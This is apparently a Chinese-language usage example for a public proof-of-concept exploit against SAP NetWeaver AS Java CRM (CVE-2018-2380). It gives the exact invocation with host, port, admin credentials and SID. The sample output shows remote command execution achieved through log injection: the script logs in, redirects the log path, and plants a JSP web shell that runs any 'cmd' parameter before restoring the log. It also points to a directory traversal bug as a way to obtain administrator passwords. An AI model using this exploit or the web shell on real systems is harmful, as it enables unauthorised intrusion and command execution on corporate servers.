通过 SAP NetWeaver AS JAVA CRM 的日志注入实现远程命令执行的 PoC 脚本使用示例
python crm_rce-CVE-2018-2380.py --host 127.0.0.1 --port 50001 --username administrator --password 123QWEasd --SID DM0 --ssl true
其中 --host 是 SAP 服务器 IP --port SAP NetWeaver AS Java 端口 可通过 SAP Redwood 目录遍历漏洞获取 SAP 管理员的用户名和密码。
脚本使用输出示例
C:\exploits\SAP>crm_rce-CVE-2018-2380.py --host 127.0.0.1 --port 50001 --username administrator --password 123QWEasd --SID DM0 --ssl true
_______ _______ _______ _______ _______ _______ _
( ____ \( ____ )( ____ )( ____ \( ____ \( ___ )( ( /|
| ( \/| ( )|| ( )|| ( \/| ( \/| ( ) || \ ( |
| (__ | (____)|| (____)|| (_____ | | | (___) || \ | |
| __) | __)| _____)(_____ )| | | ___ || (\ \) |
| ( | (\ ( | ( ) || | | ( ) || | \ |
| (____/\| ) \ \__| ) /\____) || (____/\| ) ( || ) \ |
(_______/|/ \__/|/ \_______)(_______/|/ \||/ )_)
Vahagn @vah_13 Vardanian
Bob @NewFranny
Mathieu @gelim
CVE-2018-2380
[!] 尝试通过日志注入获取 RCE
[!] 获取 j_salt 令牌以发起请求
[!] 登录 SAP 门户
[!] 更改日志路径
[!] 将 "Runtime.getRuntime().exec(request.getParameter("cmd")) " shell 上传至 https://127.0.0.1:50001/ERPScan_shell_31275.0.jsp?cmd=ipconfig
[!] 将日志路径恢复为 ./default_log_name.log
[!] 尽情享用!
C:\exploits\SAP>